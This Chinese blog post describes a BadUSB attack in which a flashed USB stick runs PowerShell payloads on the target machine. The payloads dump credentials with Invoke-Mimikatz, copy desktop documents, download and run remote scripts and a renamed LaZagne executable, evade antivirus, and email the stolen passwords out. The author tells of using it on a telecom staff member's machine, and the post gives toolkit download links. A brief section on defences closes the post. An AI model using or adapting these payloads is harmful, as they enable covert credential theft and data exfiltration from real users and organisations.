大概是從今年年初的時候關注了這一塊的話題,3月份買的TOSHIBA的U盤進行的測試,期間一直在完善利用代碼,期間收到了一些大牛的啟發,感謝Psychson這個項目的開源,DM_在PowerShell方面的文章,以及參考過三好學生,jeary等人的配置,雖然并沒有交流,但是讀了他們的帖子后實踐完善了整個利用過程。這是BadUsb的GitHub地址,以及原作者的操作視頻(YouTube俄語翻譯真心欄...自備梯子)
我在某乙方工作,一次去某省級運營商滲透前的交流時,因為來的早會議室還沒有騰出來,在安全室休息時,我所坐的位置的人電腦沒有鎖屏,但是旁邊都是安全室的人,這時候我拿出我的BadUsb,默默的去桌子底下系起了鞋帶...
打包下載,密碼: ixgw,包括量產工具,不包含JRE,win7_X64環境的編譯好了可以直接用,項目文件夾下有command.txt可以參考,如果你是別的系統版本,請使用vs2012重新編譯工具。
PS:建議就刷我的final.txt修改腳本地址即可,這樣不會存在需要重新刷短接芯片的情況,所有操作只需要修改服務器端的腳本即可。如果你已經刷壞,請先在不插電腦時短接住芯片上圓點斜對面的最外兩個針腳,然后啟動MPALL_F2_v363_0D.exe,用QC.ini,插到usb2.0口,Update幾次沒有的話說明你短接手法不好,ok了點start刷一下就恢復U盤了,再重頭來
目前的效果是只需要5秒鐘之內,可過某pc裝機量5億的殺軟,電腦閃一下屏幕就可以拔下U盤了,剩下的交給后臺的PowerShell進程,實現的功能有獲取電腦的基本信息,Invoke-mimikatz抓密碼,桌面截屏,集成LaZagne獲取系統存儲的密碼,遞歸獲取桌面所有txt doc類 xls類文件,最終打成壓縮包,可通過郵箱或者ftp發送,實戰中建議使用ftp發送 ps:因為有人桌面的文檔打包出來近GB...
看我拿本機測試能得到什么
視頻密碼 HappyTime
基本上從視頻來看 算上裝驅動大概需要10秒時間,實際執行Payload大概是5秒,所以只需要給你5秒,5秒你到底能做到什么?
友情提醒
看看我們能得到什么
這個數據量有多恐怖,這只是一個安全室普通員工電腦桌面的信息,在后來對這些信息詳細分析后發現了堡壘機跳板機的登錄密碼,以及堡壘機最高權限的賬戶,至此,該省所有設備都在控制之中,包括短彩信,智能網,長途網,話務網,以及基礎設施,都收入囊中。
抱歉因為客戶原因,無法透露過多細節,讀者可當是概念證明,畢竟威脅真實存在。
再次感謝Invoke-Mimikatz作者,感謝DM_,代碼為拼接修改而來,照慣例留坑,防伸手黨,勿怪 首先,僅通過BadUsb下載一個powershell腳本,其中在調用IEX繼續下載新的PowerShell,這樣設計是為了先拿到一份LaZagne獲取的密碼,因為有些人的桌面文檔表格太大了,需要等待很久,避免夜長夢多所為。
...
...#Invoke-Mimikatz
$folderDateTime = (get-date).ToString('d-M-y HHmmss')
$userDir = (Get-ChildItem env:\userprofile).value + '\Report ' + $folderDateTime
$fileSaveDir = New-Item ($userDir) -ItemType Directory
Invoke-Mimikatz -Dumpcreds >> $fileSaveDir'/DumpPass.txt'
$copyDir = (Get-ChildItem env:\userprofile).value + '\Desktop'
$copyToDir = New-Item $fileSaveDir'\Doc' -ItemType Directory
Dir -filter *.txt -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.doc -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.docx -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.xls -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.xlsx -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/GetPass.ps1');
GetPass.ps1
(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/GetPass.rar','D:\Get.exe');
(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/Command.rar','D:\Command.bat');
D:\Command.bat;
$SMTPServer = 'smtp.qq.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password');
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'email-address'
$ReportEmail.To.Add('To-address')
$ReportEmail.Subject = 'GetPass'
$ReportEmail.Body = 'Passwords In Applications'
$ReportEmail.Attachments.Add('D:\GetPass.txt')
$SMTPInfo.Send($ReportEmail)
remove-item 'D:\GetPass.txt'
remove-item 'D:\Get.exe'
其中的GetPass.rar實為LaZagne,直接下載exe會被大部分殺軟攔截,所以使用重命名功能,之所以調用了一個批處理,是因為LaZagne的獲取Windows密碼模塊(非sysadmin模塊)注入Lsass進程是會被殺軟攔截,所以(D:\Get.exe sysadmin & D:\Get.exe svn & D:\Get.exe database & D:\Get.exe browsers & D:\Get.exe wifi & D:\Get.exe mails) > D:\GetPass.txt 笨方法繞過殺軟。
好現在是揭曉坑的時候了- -,破壞了這個腳本刪除生成文件的地方~你們插完別人的電腦,這些臨時文件就會一直在那里躺著~包括這些密碼壓縮包喔~
既然明白了風險存在,如何防護呢?
Know it,then protect it.
首先看一種暴力的 德國LINDY USB電腦鎖 電子信息資料防護加密防盜防竊取 直接鎖死u口,可能適合跳板機,開發機使用,但是個人機器不現實。
再有就是類似sec-usb這種充電線了,斷掉usb傳輸的兩個data線,只保留power,這樣就只能充電了,某廠商有這種商品,很貴呦~
鏈接: http://pan.baidu.com/s/1c09E7PQ 密碼: 9b6p
本文獨家首發于烏云知識庫(drops.wooyun.org)。本文并沒有對任何單位和個人授權轉載。如本文被轉載,一定是屬于未經授權轉載,屬于嚴重的侵犯知識產權,本單位將追究法律責任。